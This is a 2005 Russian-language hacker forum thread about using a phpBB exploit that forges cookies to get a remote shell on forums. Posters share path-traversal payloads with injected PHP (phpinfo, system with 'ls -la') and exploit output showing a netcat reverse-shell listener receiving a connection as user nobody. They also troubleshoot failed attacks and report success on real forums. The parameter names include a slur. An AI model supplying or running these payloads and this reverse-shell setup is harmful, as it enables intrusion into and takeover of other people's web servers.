Хм... стиль на форуме сплоит он создал, тока толку от него? Не пашет...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
18.03.2005 09:40:41
Хм... стиль на форуме сплоит он создал, тока толку от него? Не пашет...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|
|
|
18.03.2005 11:14:52
Как я понял сплоит эксплуатирует недавно найденую уязвимость с подделкой куки. Профиксить эту багу и все. Эх жаль что раньше этого сплойта не было [IMG] |
|||
|
|
18.03.2005 13:44:39
Получается ничего нового не придумали, просто используют для другой цели старую дыру?
|
|
|
|
18.03.2005 14:33:25
нет еще шелл даеца =) кстати неткатом еобязательно пользоваться...
./../../../../../../../../../../../../../../../tmp&nigga=php info()<= СЮДА СМОТРЕТЬ;&sid=*** |
|
|
|
18.03.2005 14:48:12
Ну если куку не подделаешь, то и шелла не будет же...
Ведь с неправильным id форум не примет ничего... |
|
|
|
18.03.2005 15:15:07
из браузера все куки гадо удалить...
|
|
|
|
18.03.2005 19:50:37
И какой код ты собрался туда вставлять ? |
|||
|
|
18.03.2005 19:54:31
Все пустит , удаляю булки перед вставкой этого пути , потом использую второй линк подставляя /admin/index.php в Все отлично работает , но это не интерестно , а с шелами пока не получается |
|||||
|
|
18.03.2005 22:25:45
получал...
./../../../../../../../../../../../../../../../tmp&nigga=sys tem(fuck);&fuck=ls -la&sid=*** |
|
|
|
19.03.2005 00:02:17
Barsik
С кодом не проблема. Про это в других темах разжёвано Насчёт: пустит.... Меня вот не пускает, хотя делал в точности как ты описываешь [IMG] ][лам Хм... я пропарсил где-то с десяток форумов и ни один мне шелл не дал, тока ошибкими ругался [IMG]
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|
|
|
19.03.2005 00:58:12
phpbbexp.exe
C:\phpbbexp.exe _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperз ... 06bef5092f9d369f13107684f63a3499 _ recuperation du nom de la table sql ... sempervi OK _ Injection de la fake templates ...OK _ Fichier crзe C:\nc -lvvp 8888 listening on [any] 8888 ... connect to [13.37.13.37] from site.com [0.6.6.6] 57532 id uid=99(nobody) gid=99(nobody) groups=99(nobody) PS: nc - netcat net sniffer |
|
|
|
19.03.2005 01:01:07
Вместо:
nc -lvvp 8888 Лучше так: nc -vvp 13.13.13.13 8888 |
|
|
|
19.03.2005 02:54:11
Врубаю неткат nc -lvvp 888
Запускаю сплоит C:\phpbbexp.exe Все работает, кроме того, что к неткату нет подключений, файерволлов и т.д. никаких нет само собой. в чем трабл, подскажите пожалуйста. |
|
|
|
19.03.2005 12:56:18
Кошмар! не могу удержаться и не написать... Какого сюда суеться ламьё всякое, которое даже не знает, что такое nc или open_basedir restriction ??
Тем ребятам, которые смогли заюзать сами - респект... Только народ, не стоит сильно разжевывать для киддисов... а то точно ни одного форума живого не останеться... Сорри за оффтоп... |
|
|
|
19.03.2005 15:19:19
|
|||
|
|
19.03.2005 16:32:28
cr4sh
Что-то подобное дня 4 назад читал на ][лам Да куки не установлены даже! Я сплоит exe-шный юзал Кстати, ты сплоит сам компилил или в инете нашёл? Я очень сомневаюбсь что есть между этим разница, но всё-таки? Насчёт highlight=%2527. - это пройденный этап. Тот форум 2.0.3 - это просто для проверки этого сплоита
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|||
|
|
19.03.2005 18:34:43
сплоит работает на ура! Респект автору!
|
|
|
|
19.03.2005 18:51:09
Кто нибудь может сказать как защититься или ссылкой на объяснение какое этой баги угостить....
P.S. Не вижу ничего страшного в коде этого сплойта, простые попытки обращения к страницам форума, в которых для успешного выполнения операций нужен правильный id...Как кто то сказал, все основывается на старой баге с подделкой куки? И что, а если эта старая бага уже залатана, то ничего страшного этот сплойт не делает??? |
||||
|
|
|||